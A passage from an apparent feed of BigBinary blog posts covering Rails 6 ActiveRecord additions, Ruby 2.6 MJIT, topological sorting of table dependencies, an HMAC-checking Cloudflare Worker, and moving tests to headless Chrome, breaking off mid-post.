      <content type="html"><![CDATA[<p>BigBinary started in 2011. Here are our revenue numbers for the last 7 years.</p><p><img src="/blog_images/2019/marketing-strategy-at-bigbinary/revenue.png" alt="BigBinary revenue"></p><p>We achieved this to date without having any outbound marketing and salesstrategy.</p><ul><li>We have never sent a cold email.</li><li>We have never sent a cold LinkedIn message.</li><li>The only time we advertised was a period of two months when we tried Googleadvertisements, with no outcomes.</li><li>We do not sponsor any podcast.</li><li>We have not had a sales person.</li><li>We have not had a marketing person.</li></ul><p>We have kept our head down and have focused on what we do best, such asdesigning, developing, debugging, devops, and blogging.</p><p>This is what has worked out for us so far:</p><ul><li>We contribute to the community through<a href="https://blog.bigbinary.com">blog posts</a> and open source.</li><li>We sponsor community events like Rails Girls and Ruby Conf India.</li><li>We sponsor many React and Ruby meetups.</li><li>We focus on keeping our existing clients happy.</li></ul><p>Over the years I have come across many people who aspire to be freelancers.While it is not for everyone, I encourage them to give freelancing a try.</p><p>The greatest hindrance I have seen is that they stress over sales and marketing,and as it should be. Being a freelancer means constant need to find your nextclient.</p><p>I'm not here to say what others ought to do. I'm here to say what has worked outfor BigBinary over the last 7 years.</p><p>While we plan to experiment with new forms of marketing, networking, and saleschannel as we grow, it is not the end-all-be-all for freelancers. Whilemarketing, networking, and sales may be effective for some, it was not how westarted BigBinary and may not be how you want to start as well.</p><p>For us at BigBinary, it has been writing blogs. When we come across apotentially intriguing blog topic, we save the topic by creating a Github issue.When we have downtime, we pick up a topic from our issues list. Its as simpleas that and has been our primary driver of growth thus far.</p><p>While you should experiment to find out what works best for you, you need tofind out what suits your personality. If you are good at teaching throughvideos, consider creating your own YouTube channel. If you contribute to opensource, try creating a blog about your efforts and learnings. If you are good atconcentrating on a niche technology, build your marketing and business aroundthat.</p><p>I can confidently say that majority of people I met and who want to befreelancer would do fine if they simply share what they are learning. Most ofthese people do technical work. Some of them already blog and others can blog. Ablog is a decent start nearly everybody will say. I'm saying that it is a goodend too.</p><p>If you do not want to do any other form of marketing then that's fine too. Justblogging will work out fine for you just like it has worked out fine for us atBigBinary.</p><p>Just because you are going to be a freelancer you dont have to change who youare. If you don't like sending cold emails then don't. If you do not likenetworking then thats alright as well. Write personal emails, dump corporatetalk, show compassion and be genuine.</p><p>So go on and do some freelancing. It would teach you a lot about softwaredevelopment, business, life, managing money, creating value and capturing value.It will be rough at times. And it would be hard at times. But it would also be aton of fun.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 delete_by, destroy_by ActiveRecord::Relation]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-delete_by-and-activerecord-relation-destroy_by"/>
      <updated>2019-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-delete_by-and-activerecord-relation-destroy_by</id>
      <content type="html"><![CDATA[<p>As described by DHH in <a href="https://github.com/rails/rails/issues/35304">the issue</a>,Rails has <code>find_or_create_by</code>, <code>find_by</code> and similar methods to create and findthe records matching the specified conditions. Rails was missing similar featurefor deleting/destroying the record(s).</p><p>Before Rails 6, deleting/destroying the record(s) which are matching the givencondition was done as shown below.</p><pre><code class="language-ruby"># Example to destroy all authors matching the given conditionAuthor.find_by(email: &quot;abhay@example.com&quot;).destroyAuthor.where(email: &quot;abhay@example.com&quot;, rating: 4).destroy_all# Example to delete all authors matching the given conditionAuthor.find_by(email: &quot;abhay@example.com&quot;).deleteAuthor.where(email: &quot;abhay@example.com&quot;, rating: 4).delete_all</code></pre><p>The above examples were missing the symmetry like <code>find_or_create_by</code> and<code>find_by</code> methods.</p><p>In Rails 6, the new <code>delete_by</code> and <code>destroy_by</code> methods have been added asActiveRecord::Relation methods. <code>ActiveRecord::Relation#delete_by</code> is short-handfor <code>relation.where(conditions).delete_all</code>. Similarly,<code>ActiveRecord::Relation#destroy_by</code> is short-hand for<code>relation.where(conditions).destroy_all</code>.</p><p>Here is how it can be used.</p><pre><code class="language-ruby"># Example to destroy all authors matching the given condition using destroy_byAuthor.destroy_by(email: &quot;abhay@example.com&quot;)Author.destroy_by(email: &quot;abhay@example.com&quot;, rating: 4)# Example to destroy all authors matching the given condition using delete_byAuthor.delete_by(email: &quot;abhay@example.com&quot;)Author.delete_by(email: &quot;abhay@example.com&quot;, rating: 4)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/35316">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveRecord::Relation#touch_all]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-touch-all"/>
      <updated>2019-03-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-touch-all</id>
      <content type="html"><![CDATA[<p>Before moving forward, we need to understand what the<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/Persistence.html#method-i-touch">touch</a>method does.<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/Persistence.html#method-i-touch">touch</a>is used to update the <code>updated_at</code> timestamp by defaulting to the current time.It also takes custom time or different columns as parameters.</p><p>Rails 6 has added <a href="https://github.com/rails/rails/pull/31513">touch_all</a> onActiveRecord::Relation to touch multiple records in one go. Before Rails 6, weneeded to iterate all records using an iterator to achieve this result.</p><p>Let's take an example in which we call<a href="https://github.com/rails/rails/pull/31513">touch_all</a> on all user records.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; User.countSELECT COUNT(\*) FROM &quot;users&quot;=&gt; 3&gt;&gt; User.all.touch_all=&gt; Traceback (most recent call last):1: from (irb):2NoMethodError (undefined method 'touch_all' for #&lt;User::ActiveRecord_Relation:0x00007fe6261f9c58&gt;)&gt;&gt; User.all.each(&amp;:touch)SELECT &quot;users&quot;.* FROM &quot;users&quot;begin transaction  UPDATE &quot;users&quot; SET &quot;updated_at&quot; = ? WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-05 17:45:51.495203&quot;], [&quot;id&quot;, 1]]commit transactionbegin transaction  UPDATE &quot;users&quot; SET &quot;updated_at&quot; = ? WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-05 17:45:51.503415&quot;], [&quot;id&quot;, 2]]commit transactionbegin transaction  UPDATE &quot;users&quot; SET &quot;updated_at&quot; = ? WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-05 17:45:51.509058&quot;], [&quot;id&quot;, 3]]commit transaction=&gt; [#&lt;User id: 1, name: &quot;Sam&quot;, created_at: &quot;2019-03-05 16:09:29&quot;, updated_at: &quot;2019-03-05 17:45:51&quot;&gt;, #&lt;User id: 2, name: &quot;John&quot;, created_at: &quot;2019-03-05 16:09:43&quot;, updated_at: &quot;2019-03-05 17:45:51&quot;&gt;, #&lt;User id: 3, name: &quot;Mark&quot;, created_at: &quot;2019-03-05 16:09:45&quot;, updated_at: &quot;2019-03-05 17:45:51&quot;&gt;]</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; User.countSELECT COUNT(*) FROM &quot;users&quot;=&gt; 3&gt;&gt; User.all.touch_allUPDATE &quot;users&quot; SET &quot;updated_at&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-05 16:08:47.490507&quot;]]=&gt; 3</code></pre><p><a href="https://github.com/rails/rails/pull/31513">touch_all</a> returns count of therecords on which it is called.</p><p><a href="https://github.com/rails/rails/pull/31513">touch_all</a> also takes a custom timeor different columns as parameters.</p><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; User.countSELECT COUNT(*) FROM &quot;users&quot;=&gt; 3&gt;&gt; User.all.touch_all(time: Time.new(2019, 3, 2, 1, 0, 0))UPDATE &quot;users&quot; SET &quot;updated_at&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-02 00:00:00&quot;]]=&gt; 3&gt;&gt; User.all.touch_all(:created_at)UPDATE &quot;users&quot; SET &quot;updated_at&quot; = ?, &quot;created_at&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-03-05 17:55:41.828347&quot;], [&quot;created_at&quot;, &quot;2019-03-05 17:55:41.828347&quot;]]=&gt; 3</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/31513">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds negative scopes on enum]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-negative-scopes-on-enum"/>
      <updated>2019-03-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-negative-scopes-on-enum</id>
      <content type="html"><![CDATA[<p>When an enum attribute is defined on a model, Rails adds some default scopes tofilter records based on values of enum on enum field.</p><p>Here is how enum scope can be used.</p><pre><code class="language-ruby">class Post &lt; ActiveRecord::Base  enum status: %i[drafted active trashed]endPost.drafted # =&gt; where(status: :drafted)Post.active  # =&gt; where(status: :active)</code></pre><p>In Rails 6, negative scopes are added on the enum values.</p><p>As mentioned by DHH in the pull request,</p><blockquote><p>these negative scopes are convenient when you want to disallow access incontrollers</p></blockquote><p>Here is how they can be used.</p><pre><code class="language-ruby">class Post &lt; ActiveRecord::Base  enum status: %i[drafted active trashed]endPost.not_drafted # =&gt; where.not(status: :drafted)Post.not_active  # =&gt; where.not(status: :active)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/35381">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[MJIT Support in Ruby 2.6]]></title>
       <author><name>Sudeep Tarlekar</name></author>
      <link href="https://www.bigbinary.com/blog/mjit-support-in-ruby-2-6"/>
      <updated>2019-03-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/mjit-support-in-ruby-2-6</id>
      <content type="html"><![CDATA[<h3>What is JIT?</h3><p>JIT stands for Just-In-Time compiler. JIT converts repetitive code into bytecodewhich can then be sent to the processor directly, hence, saving time by notcompiling the same piece of code over and over.</p><h3>Ruby 2.6</h3><p>MJIT is introduced in Ruby 2.6. It is most commonly known as MRI JIT or MethodBased JIT.</p><p>It is a part of the Ruby 3x3 project started by Matz. The name &quot;Ruby 3x3&quot;signifies Ruby 3.0 will be 3 times faster than Ruby 2.0 and it will focus mainlyon performance. In addition to performance, it also aims for the followingthings:</p><ol><li>Portability</li><li>Stability</li><li>Security</li></ol><p>MJIT is still in development, therefore, MJIT is optional in Ruby 2.6. If youare running Ruby 2.6, then you can execute the following command.</p><pre><code class="language-shell">ruby --help</code></pre><p>You will see following options.</p><pre><code class="language-shell">--Jit-wait # Wait program execution until code compiles.--jit-verbose=num # Level information MJIT compiler prints for Ruby program.--jit-min-calls=num # Minimum count in loops for which MJIT should work.--jit-max-cache--jit-save-temps # Save compiled library to the file.</code></pre><p>Vladimir Makarov proposed improving performance by replacing VM instructionswith RTL(Register Transfer Language) and introducing the Method based JITcompiler.</p><p>Vladimir explained MJIT architecture in his<a href="https://youtu.be/qpZDw-p9yag?t=1655">RubyKaigi 2017 conference keynote</a>.</p><p>Ruby's compiler converts the code to YARV(Yet Another Ruby VM) instructions andthen these instructions are run by the Ruby Virtual Machine. Code that isexecuted too often is converted to RTL instructions, which runs faster.</p><p>Let's take a look at how MJIT works.</p><pre><code class="language-ruby"># mjit.rbrequire 'benchmark'puts Benchmark.measure {def test_whilestart_time = Time.nowi = 0    while i &lt; 4      i += 1    end    i    puts Time.now - start_timeend4.times { test_while }}</code></pre><p>Let's run this code with MJIT options and check what we got.</p><pre><code class="language-shell">ruby --jit --jit-verbose=1 --jit-wait --disable-gems mjit.rb</code></pre><pre><code class="language-shell">Time taken is 4.0e-06Time taken is 0.0Time taken is 0.0Time taken is 0.00.000082 0.000032 0.000114 ( 0.000105)Successful MJIT finish</code></pre><p>Nothing interesting right? And why is that? because we are iterating the loopfor 4 times and default value for MJIT to work is 5. We can always decide afterhow many calls MJIT should work by providing <code>--jit-min-calls=#number</code> option.</p><p>Let's tweak the program a bit so MJIT gets to work.</p><pre><code class="language-ruby">require 'benchmark'puts Benchmark.measure {def test_whilestart_time = Time.nowi = 0    while i &lt; 4_00_00_000      i += 1    end    puts &quot;Time taken is #{Time.now - start_time}&quot;end10.times { test_while }}</code></pre><p>After running the above code we can see some work done by MJIT.</p><pre><code class="language-shell">Time taken is 0.457916Time taken is 0.455921Time taken is 0.454672Time taken is 0.452823JIT success (72.5ms): block (2 levels) in &lt;main&gt;@mjit.rb:15 -&gt; /var/folders/v6/\_6sh53vn5gl3lct18w533gr80000gn/T//\_ruby_mjit_p66220u0.cJIT success (140.9ms): test_while@mjit.rb:4 -&gt; /var/folders/v6/\_6sh53vn5gl3lct18w533gr80000gn/T//\_ruby_mjit_p66220u1.cJIT compaction (23.0ms): Compacted 2 methods -&gt; /var/folders/v6/\_6sh53vn5gl3lct18w533gr80000gn/T//\_ruby_mjit_p66220u2.bundleTime taken is 0.463703Time taken is 0.102852Time taken is 0.103335Time taken is 0.103299Time taken is 0.103252Time taken is 0.1032612.797843 0.005357 3.141944 ( 2.801391)Successful MJIT finish</code></pre><p>Here's what's happening. Method ran 4 times and on the 5th call it found it isrunning same code again. So MJIT started a separate thread to convert the codeinto RTL instructions, which created a shared object library. Next, threads tookthat shared code and executed directly. As we passed option <code>--jit-verbose=1</code> wecan see what MJIT did.</p><p>What we are seeing in output is the following:</p><ol><li>Time taken to compile.</li><li>What block of code is compiled by JIT.</li><li>Location of compiled code.</li></ol><p>We can open the file and see how MJIT converted the piece of code to binaryinstructions but for that we need to pass another option which is<code>--jit-save-temps</code> and then just inspect those files.</p><p>After compiling the code to RTL instructions, take a look at the execution time.It dropped down to 0.10 ms from 0.46 ms. That's a neat speed bump.</p><p>Here is a comparison across some of the Ruby versions for some basic operations.</p><p>![Ruby time comparison in different versions](/blog_images/imageruby_mjit_execution_comparison.png)</p><h2>Rails comparison on Ruby 2.5, Ruby 2.6 and Ruby 2.6 with JIT</h2><p>Create a rails application with different Ruby versions and start a server. Wecan start the rails server with the JIT option, as shown below.</p><pre><code class="language-shell">RUBYOPT=&quot;--jit&quot; bundle exec rails s</code></pre><p>Now, we can start testing the performance on servers. We found that Ruby 2.6 isfaster than Ruby 2.5, but enabling JIT in Ruby 2.6 does not add more value tothe Rails application.</p><h2>MJIT status and future directions</h2><ul><li>It is in an early development stage.</li><li>Does not work on windows.</li><li>Needs more time to mature.</li><li>Needs more optimisations.</li><li>MJIT can use GCC or LLVM in the future C Compilers.</li></ul><h2>Further reading</h2><ol><li><a href="https://developers.redhat.com/blog/2018/03/22/ruby-3x3-performance-goal">Ruby 3x3 Performance Goal</a></li><li><a href="https://medium.com/@k0kubun/the-method-jit-compiler-for-ruby-2-6-388ee0989c13">The method JIT compiler for Ruby2.6</a></li><li><a href="https://github.com/vnmakarov/ruby/tree/rtl_mjit_branch">Vladimir Makarov's Ruby Edition</a></li></ol>]]></content>
    </entry><entry>
       <title><![CDATA[Resolve foreign key constraint conflict]]></title>
       <author><name>Narendra Rajput</name></author>
      <link href="https://www.bigbinary.com/blog/resolve-foreign-key-constraint-conflict-while-copying-data-using-topological-sort"/>
      <updated>2019-02-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/resolve-foreign-key-constraint-conflict-while-copying-data-using-topological-sort</id>
      <content type="html"><![CDATA[<p>We have a client that uses multi-tenant databasewhere each database holds data for each of their customers.Whenever a new customer is added, a service dynamically creates a new database.In order to seed this new database we were taskedto implement a feature to copy data from existing &quot;demo&quot; database.</p><p>The &quot;demo&quot; database is actually a live client where sales team does demo.This ensures that the data that is copied is fresh and not stale.</p><p>We implemented a solution where we simply listed all the tables in namespace and used <a href="https://github.com/zdennis/activerecord-import">activerecord-import</a>to copy the table data.We used <code>activerecord-import</code> gem to keep code agnostic of underlying database as we used different databases in development from production.Production is &quot;SQL Server&quot; and development database is &quot;PostgreSQL&quot;.Why this project ended up having different database in development and in productionis worthy of a separate blog.</p><p>When we started using the above mentioned strategy thenwe quickly ran into a problem.Inserts for some tables were failing.</p><pre><code class="language-plaintext">insert or update on table &quot;dependent_table&quot; violates foreign key constraint &quot;fk_rails&quot;Detail: Key (column)=(1) is not present in table &quot;main_table&quot;.</code></pre><p>The issue was we had foreign key constraints on some tables and &quot;dependent&quot; table was being processed before the &quot;main&quot; table.</p><p>So initially we thought of simply hard coding the sequence in which to process the tables. It means if any new table is added then we will have to update the service to include the newly added table. So we needed a way to identify the foreign key dependencies and determine the sequence to copy the tables at runtime. To resolve this issue, we thought of using<a href="https://en.wikipedia.org/wiki/Topological_sorting">Topological Sorting</a>.</p><h2>Topological Sorting</h2><p>To get started we need the list of dependencies of &quot;main&quot; and &quot;dependent&quot; tables.In Postgresql, this sql query fetches the table dependencies.</p><pre><code class="language-sql">SELECT    tc.table_name AS dependent_table,    ccu.table_name AS main_tableFROM    information_schema.table_constraints AS tc    JOIN information_schema.key_column_usage AS kcu      ON tc.constraint_name = kcu.constraint_name      AND tc.table_schema = kcu.table_schema    JOIN information_schema.constraint_column_usage AS ccu      ON ccu.constraint_name = tc.constraint_name      AND ccu.table_schema = tc.table_schemaWHERE constraint_type = 'FOREIGN KEY'and (tc.table_name like 'namespace_%' or ccu.table_name like 'namespace_%');=&gt; dependent_table  | main_table-----------------------------------   dependent_table1 | main_table1   dependent_table2 | main_table2</code></pre><p>The above query fetches all the dependencies for only the tables have namespace or the tables we are interested in.The output of above query was <code>[[dependent_table1, main_table1], [dependent_table2, main_table2]]</code>.</p><p>Ruby has a <code>TSort</code> module that for implementing topological sorts.So we needed to run the topological sort on the dependencies. So we inserted the dependencies into a hash and included the <code>TSort</code> functionality into the hash. Following is the way to include the <code>TSort</code> module into hash by subclassing the <code>Hash</code>.</p><pre><code class="language-ruby">require &quot;tsort&quot;class TsortableHash &lt; Hash  include TSort  alias tsort_each_node each_key  def tsort_each_child(node, &amp;block)    fetch(node).each(&amp;block)  endend# Borrowed from https://www.viget.com/articles/dependency-sorting-in-ruby-with-tsort/</code></pre><p>Then we simply added all the tables to dependency hash, as below</p><pre><code class="language-ruby">tables_to_sort = [&quot;dependent_table1&quot;, &quot;dependent_table2&quot;, &quot;main_table1&quot;]dependency_graph = tables_to_sort.inject(TsortableHash.new) {|hash, table| hash[table] = []; hash }table_dependency_map = fetch_table_dependencies_from_database=&gt; [[&quot;dependent_table1&quot;, &quot;main_table1&quot;], [&quot;dependent_table2&quot;, &quot;main_table2&quot;]]# Add missing tables to dependency graphtable_dependency_map.flatten.each {|table| dependency_graph[table] ||= [] }table_dependency_map.each {|constraint| dependency_graph[constraint[0]] &lt;&lt; constraint[1] }dependency_graph.tsort=&gt; [&quot;main_table1&quot;, &quot;dependent_table1&quot;, &quot;main_table2&quot;, &quot;dependent_table2&quot;]</code></pre><p>The output above, is the dependency resolved sequence of tables.</p><p>Topological sorting is pretty useful in situations where we need to resolve dependencies and Ruby provides a really helpful tool <code>TSort</code> to implement it without going into implementation details. Although I did spend time in understanding the underlying algorithm for fun.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Cache all files with Cloudflare worker and HMAC auth]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-cache-all-files-using-cloudflare-worker-along-with-hmac-authentication"/>
      <updated>2019-01-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-cache-all-files-using-cloudflare-worker-along-with-hmac-authentication</id>
      <content type="html"><![CDATA[<p><a href="https://www.cloudflare.com/">Cloudflare</a> is a Content Delivery Network (CDN)company that provides various network and security services. In March 2018, they<a href="https://blog.cloudflare.com/introducing-cloudflare-workers/">released</a>&quot;Cloudflare Workers&quot; feature for public. Cloudflare Workers allow us to writeJavaScript code and run them in Cloudflare edges. This is helpful when we wantto pre-process requests before forwarding them to the origin. In this post, wewill explain how we implemented<a href="https://en.wikipedia.org/wiki/HMAC">HMAC authentication</a> while caching allfiles in Cloudflare edges.</p><p>We have a bunch of files hosted in S3 which are served through CloudFront. Toreduce the CloudFront bandwidth cost and to make use of a global CDN (we use<code>Price Class 100</code> in CloudFront), we decided to use Cloudflare for filedownloads. This would help us cache files in Cloudflare edges and willeventually reduce the bandwidth costs at origin (CloudFront). But to do this, wehad to solve a few problems.</p><p>We had been signing CloudFront download URLs to restrict their usage after aperiod of time. This means the file download URLs are always unique. SinceCloudflare caches files based on URLs, caching will not work when the URLs aresigned. We had to remove the URL signing to get it working with Cloudflare, butwe can't allow people to continuously use the same download URL. CloudflareWorkers helped us with this.</p><p>We negotiated a deal with Cloudflare and upgraded the subscription to Enterpriseplan. Enterprise plan helps us define a<a href="https://developers.cloudflare.com/workers/reference/cloudflare-features/">Custom Cache Key</a>using which we can configure Cloudflare to cache based on user defined key.Enterprise plan also increased cache file size limits. We wrote following Workercode which configures a custom cache key and authenticates URLs using HMAC.</p><p>Cloudflare worker starts with attaching a method to <code>&quot;fetch&quot;</code> event.</p><pre><code class="language-javascript">addEventListener(&quot;fetch&quot;, event =&gt; {  event.respondWith(verifyAndCache(event.request));});</code></pre><p><code>verifyAndCache</code> function can be defined as follows.</p><pre><code class="language-javascript">async function verifyAndCache(request) {  /**  source:  https://jameshfisher.com/2017/10/31/web-cryptography-api-hmac.html  https://github.com/diafygi/webcrypto-amples#hmac-verify  https://stackoverflow.com/questions/17191945/conversion-between-utf-8-arraybuffer-and-string  **/  // Convert the string to array of its ASCII values  function str2ab(str) {    let uintArray = new Uint8Array(      str.split(&quot;&quot;).map(function (char) {        return char.charCodeAt(0);      })    );    return uintArray;  }  // Retrieve to token from query string which is in the format &quot;&lt;time&gt;-&lt;auth_code&gt;&quot;  function getFullToken(url, query_string_key) {    let full_token = url.split(query_string_key)[1];    return full_token;  }  // Fetch the authentication code from token  function getAuthCode(full_token) {    let token = full_token.split(&quot;-&quot;);    return token[1].split(&quot;/&quot;)[0];  }  // Fetch timestamp from token  function getExpiryTimestamp(full_token) {    let timestamp = full_token.split(&quot;-&quot;);    return timestamp[0];  }  // Fetch file path from URL  function getFilePath(url) {    let url_obj = new URL(url);    return decodeURI(url_obj.pathname);  }  const full_token = getFullToken(request.url, &quot;&amp;verify=&quot;);  const token = getAuthCode(full_token);  const str =    getFilePath(encodeURI(request.url)) + &quot;/&quot; + getExpiryTimestamp(full_token);  const secret = &quot;&lt; HMAC KEY &gt;&quot;;  // Generate the SHA-256 hash from the secret string  let key = await crypto.subtle.importKey(    &quot;raw&quot;,    str2ab(secret),    { name: &quot;HMAC&quot;, hash: { name: &quot;SHA-256&quot; } },    false,    [&quot;sign&quot;, &quot;verify&quot;]  );  // Sign the &quot;str&quot; with the key generated previously  let sig = await crypto.subtle.sign({ name: &quot;HMAC&quot; }, key, str2ab(str));  // convert the Arraybuffer &quot;sig&quot; in string and then, in Base64 digest, and then URLencode it  let verif = encodeURIComponent(    btoa(String.fromCharCode.apply(null, new Uint8Array(sig)))  );  // Get time in Unix epoch  let time = Math.floor(Date.now() / 1000);  if (time &gt; getExpiryTimestamp(full_token) || verif != token) {    // Render error response    const init = {      status: 403,    };    const modifiedResponse = new Response(`Invalid token`, init);    return modifiedResponse;  } else {    let url = new URL(request.url);    // Generate a cache key from URL excluding the unique query string    let cache_key = url.host + url.pathname;    let headers = new Headers(request.headers);    /**    Set an optional header/auth token for additional security in origin.    For example, using AWS Web Application Firewall (WAF), it is possible to create a filter    that allows requests only with a custom header to pass through CloudFront distribution.    **/    headers.set(&quot;X-Auth-token&quot;, &quot;&lt; Optional Auth Token &gt;&quot;);    /**    Fetch the file using cache_key. File will be served from cache if it's already there,    or it will send the request to origin. Please note 'cacheKey' is available only in    Enterprise plan.    **/    const response = await fetch(request, {      cf: { cacheKey: cache_key },      headers: headers,    });    return response;  }}</code></pre><p>Once the worker is added, configure an associated route in<code>&quot;Workers -&gt; Routes -&gt; Add Route&quot;</code> in Cloudflare.</p><p><img src="/blog_images/2019/how-to-cache-all-files-using-cloudflare-worker-along-with-hmac-authentication/cloudflare-add-worker-route.png" alt="Add Cloudflare Worker route"></p><p>Now, all requests will go through the configured Cloudflare worker. Each requestwill be verified using HMAC authentication and all files will be cached inCloudflare edges. This would reduce bandwidth costs at the origin.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Replacing PhantomJS with headless Chrome]]></title>
       <author><name>Navaneeth PK</name></author>
      <link href="https://www.bigbinary.com/blog/replacing-phantomjs-with-headless-chrome"/>
      <updated>2019-01-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/replacing-phantomjs-with-headless-chrome</id>
      <content type="html"><![CDATA[<p>We recently replaced PhantomJS with ChromeDriver for system tests in a project since<a href="https://github.com/ariya/phantomjs/issues/15344">PhantomJS is no longer maintained</a>.Many modern browser features required workarounds and hacks to work on PhantomJS.For example the <code>Element.trigger('click')</code> method does not actually click anelement but simulates a DOM click event.These workarounds meant that code was not being tested as the code would behavein real production environment.</p><h4>ChromeDriver Installation &amp; Configuration</h4><p>ChromeDriver is needed to use Chrome as the browser for system tests.It can be installed on macOS using<a href="https://brew.sh">homebrew</a>.</p><pre><code class="language-bash">brew cask install chromedriver</code></pre><p>Remove <code>poltergeist</code> from Gemfile and add <code>selenium-webdriver</code>.</p><pre><code class="language-ruby">#Gemfile- gem &quot;poltergeist&quot;+ gem &quot;selenium-webdriver&quot;</code></pre><p>Configure Capybara to use ChromeDriver by adding following snippet.</p><pre><code class="language-ruby">require 'selenium-webdriver'Capybara.register_driver(:chrome_headless) do |app|  args = []  args &lt;&lt; 'headless' unless ENV['CHROME_HEADLESS']  capabilities = Selenium::WebDriver::Remote::Capabilities.chrome(    chromeOptions: { args: args }  )  Capybara::Selenium::Driver.new(    app,    browser: :chrome,    desired_capabilities: capabilities  )endCapybara.default_driver = :chrome_headless</code></pre><p>Above code would run tests in headless mode by default.For debugging purpose we would like to see the actualbrowser. That can be easily done by executing following command.</p><pre><code class="language-ruby">CHROME_HEADLESS=false bin/rails test:system</code></pre><p>After switching from Phantom.js to &quot;headless chrome&quot;,we ran into many test failuresdue to the differences in implementation of Capybara APIwhen using ChromeDriver.Here are solutions to some of the issues we faced.</p><h4>1. Element.trigger('click') does not exist</h4><p><code>Element.trigger('click')</code> simulates a DOM event to click instead of actually clicking the element. This is a bad practice because the element might be obscured behind another element and still trigger the click. Selenium does not support this method, <code>Element.click</code> works as the solution but it is not a replacement. We can replace <code>Element.trigger('click')</code> with <code>Element.send_keys(:return)</code> or by executing javascript to trigger click event.</p><pre><code class="language-ruby">#examplefind('.foo-link').trigger('click')# solutionsfind('.foo-link').click# orfind('.foo-link').send_keys(:return)# or# if the link is not visible or is overlapped by another elementexecute_script(&quot;$('.foo-link').click();&quot;)</code></pre><h3>2. Element is not visible to click</h3><p>When we switched to <code>Element.click</code>,some tests were failing because the element was not visible as it was behind another element.The easiest solution to fix these failing test was using <code>Element.send_keys(:return)</code>but purpose of the test is to simulate a real user clicking the element.So we had to make sure the element is visible.We fixed the UI issues which prevented the element from being visible.</p><h4>3. Setting value of hidden fields do not work</h4><p>When we try to set the value of a hidden input field using the <code>set</code> method of an element,Capybara throws a <code>element not interactable</code> error.</p><pre><code class="language-ruby">#examplefind(&quot;.foo-field&quot;, visible: false).set(&quot;some text&quot;)#Error: element not interactable#solutionpage.execute_script('$(&quot;.foo-field&quot;).val(&quot;some text&quot;)')</code></pre><h4>4. Element.visible? returns false if the element is empty</h4><p><a href="https://www.rubydoc.info/gems/capybara/Capybara%2FSessionConfig:ignore_hidden_elements"><code>ignore_hidden_elements</code></a> option of Capybara is <code>false</code> by default.If <code>ignore_hidden_elements</code> is <code>true</code>, Capybara will find elementswhich are only visible on the page.Let's say we have <code>&lt;div class=&quot;empty-element&quot;&gt;&lt;/div&gt;</code> on our page. <code>find(&quot;.empty-element&quot;).visible?</code> returns <code>false</code> because selenium considers empty elements as invisible. This issue can be resolved by using <code>visible: :any</code>.</p><pre><code class="language-ruby">#example#ignore hidden elementsCapybara.ignore_hidden_elements = truefind(&quot;.empty-element&quot;).visible?# returns false#solutionfind('.empty-element', visible: :any)#orfind('.empty-element', visible: :all)#orfind('.empty-element', visible: false)</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveRecord::Relation#pick]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-pick"/>
      <updated>2019-01-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-pick</id>
      <content type="html"><![CDATA[<p>Before Rails 6,selecting only the first value for a columnfrom a set of records was cumbersome.Let's say we want only the first namefrom all the posts with category &quot;Rails 6&quot;.</p><pre><code class="language-ruby">&gt;&gt; Post.where(category: &quot;Rails 6&quot;).limit(1).pluck(:name).first   SELECT &quot;posts&quot;.&quot;name&quot;   FROM &quot;posts&quot;   WHERE &quot;posts&quot;.&quot;category&quot; = ?   LIMIT ?  [[&quot;category&quot;, &quot;Rails 6&quot;], [&quot;LIMIT&quot;, 1]]=&gt; &quot;Rails 6 introduces awesome shiny features!&quot;</code></pre><p>In Rails 6, the new<a href="https://github.com/rails/rails/pull/31941">ActiveRecord::Relation#pick</a>method has been added which provides a shortcut to select the first value.</p><pre><code class="language-ruby">&gt;&gt; Post.where(category: &quot;Rails 6&quot;).pick(:name)   SELECT &quot;posts&quot;.&quot;name&quot;   FROM &quot;posts&quot;   WHERE &quot;posts&quot;.&quot;category&quot; = ?   LIMIT ?  [[&quot;category&quot;, &quot;Rails 6&quot;], [&quot;LIMIT&quot;, 1]]=&gt; &quot;Rails 6 introduces awesome shiny 